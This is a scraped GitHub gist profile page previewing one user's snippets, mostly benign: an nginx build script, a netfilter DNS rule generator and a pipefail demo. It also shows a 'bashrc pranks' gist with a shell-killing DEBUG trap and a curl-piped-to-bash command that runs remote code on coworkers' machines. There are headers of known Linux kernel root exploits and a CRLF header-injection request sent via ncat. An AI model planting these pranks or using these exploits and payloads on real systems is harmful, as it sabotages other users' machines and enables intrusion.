Skip to content

Instantly share code, notes, and snippets.

View yoramvandevelde's full-sized avatar

Yoram van de Velde yoramvandevelde

  • Nijmegen, Netherlands
View GitHub Profile
@yoramvandevelde
yoramvandevelde / build_nginx.sh
Created July 18, 2016 11:51 — forked from Belphemur/build_nginx.sh
Compiling Nginx with LibreSSL (and http2)
#!/usr/bin/env bash
# names of latest versions of each package
export NGINX_VERSION=1.11.1
export VERSION_PCRE=pcre-8.38
export VERSION_LIBRESSL=libressl-2.4.1
export VERSION_NGINX=nginx-$NGINX_VERSION
#export NPS_VERSION=1.9.32.10
#export VERSION_PAGESPEED=v${NPS_VERSION}-beta

Keybase proof

I hereby claim:

  • I am yoramvandevelde on github.
  • I am yoram (https://keybase.io/yoram) on keybase.
  • I have a public key ASCWllnVtkiiXmGkq-GudwXvcbOUhPs3kzHm-pLwpppZ4Ao

To claim this, I am signing this object:

#!/usr/bin/python
"""
Produces a Linux Netfilter u32 rule to match DNS requests for a given
domain name and/or a given query type.
Typical usage:
% python generate-netfilter-u32-rule.py --qname ripe.net --qtype ANY
Can be embedded in iptables' invocations for instance:
rule=$(python generate-rule.py args...)
@yoramvandevelde
yoramvandevelde / pipefail_examples.sh
Created August 17, 2017 07:13
Examples of why pipefail is really important to use
#!/bin/bash
# author: Yoram van de Velde ( [email protected] )
# Examples of why pipefail is really important to use.
# We enable exit on error functionality
set -o errexit
# These commands will fail but not stop the script because of the pipes
# to succesfull commands. This works because error is output to stderr,
@yoramvandevelde
yoramvandevelde / gist:80d9508e94224b9dac08f75abc5fd1ba
Last active August 18, 2017 13:02
Making coworkers hate me through bashrc's
# https://www.quora.com/Bash-shell-What-are-the-best-bashrc-pranks/answer/Baptiste-Fontaine
trap '[ "$RANDOM" -le 2000 ] && exit' DEBUG
# confuse the damn kids
export PS1='C:${PWD////\\\\}> '
# sysadmin's april fouls rickroll
curl -s -L https://raw.githubusercontent.com/keroserene/rickrollrc/master/roll.sh | bash
# poor man's sl
/*
* diane_lane_fucked_hard.c
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.23 - 2.6.24
*/
#define _GNU_SOURCE
#include <stdio.h>
/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
* Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com
*
*
* NOTE: you need at least one sctp application bound on the target box
*
* Supported target:
/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
# Problem with header manipulation because of CRLF injection
# on nginx this is because of $host$uri usage over $host$request_uri
$ echo -e "GET /%0D%0ASet-Cookie: hack%0D%0AX-FoRwArDeDFor: yoram HTTP/1.1\r\nHost: $HOSTNAME\r\n" | \
ncat $HOSTNAME 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 01 Apr 2021 10:15:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
# Run as administrator
netsh advfirewall firewall add rule name="allow xdebug" dir=in action=allow protocol=TCP localport=9003